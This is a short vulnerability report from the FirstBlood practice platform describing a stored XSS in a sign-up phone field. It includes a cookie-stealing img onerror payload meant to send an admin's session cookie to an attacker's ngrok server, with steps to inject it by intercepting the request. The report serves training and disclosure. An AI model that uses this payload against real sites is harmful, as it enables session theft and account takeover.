FirstBlood-#1148Stored xss in HackerBack sign up phone number to Account takeover
This issue was discovered on FirstBlood v3

On 2022-12-08, didsec Level 5 reported:

I have discovered a stored XSS vulnerability affecting the HackerBack sign up allowing for the retravel of the users cookie that is not using HTTP_ONLY


<img/src=x onerror="window.location.href=''%2bdocument.cookie">

To reproduce:

  1. Visit
  2. Click the join event button
  3. Add any name and phone number
  4. click sign up and intercept the request
  5. replace the phone value with the payload
  6. forward the request

When a user views the drpanel the users drps cookie will be sent to your ngrok server


  1. The attacker can steal the cookie from whoever views the page allowing a account takeover.
  2. The attacker can steal data from whoever views the page.
  3. Users can execute arbitrary JavaScript code in the context of other users.


FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.